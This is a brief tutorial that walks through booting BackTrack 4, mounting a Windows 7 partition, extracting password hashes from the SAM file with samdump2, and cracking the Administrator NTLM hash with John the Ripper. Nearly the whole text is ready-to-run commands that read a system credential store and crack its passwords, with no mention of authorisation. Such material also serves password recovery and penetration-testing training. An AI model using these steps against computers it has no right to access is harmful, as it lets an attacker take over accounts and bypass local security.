1. Boot the system with backtrack4 and wait for the operating system to load. Use "startx" command to get the desktop. 2. Open the Konsole and use the command "fdisk -l" to know the details of your partition. The partition sda stands for sata type and hda stands for ide. 3. Create a directory say
"mkdir /mnt/sda2"
4. Mount your device parition to the directory
"mount -t ntfs /dev/sda2 /mnt/sda2"
where /dev/sda2 is the your windows7 operating system partition. 5. change the directory to the location "SAM" file where the passwords hashes of windows operating system is present.
"cd /mnt/sda2/Windows/System32/config"
6. Use the tool "Samdump" to move the hashes from the SAM file to the file "pass1"
"samdump2 system sam > /root/pass1"
7. using the "grep" command search the Administrator hash in the file and write it to another file "pass2"
"cat /root/pass1 | grep Administrator > /root/pass2"
8. Change the directory to /pentest/password/jtr
"cd /pentest/passwords/jtr"
9. Type ./john to see the format and various options of cracking. 10. Here windows use the NTLM hash so we use the following command to crack it.
"./john --format=NT /root/pass2"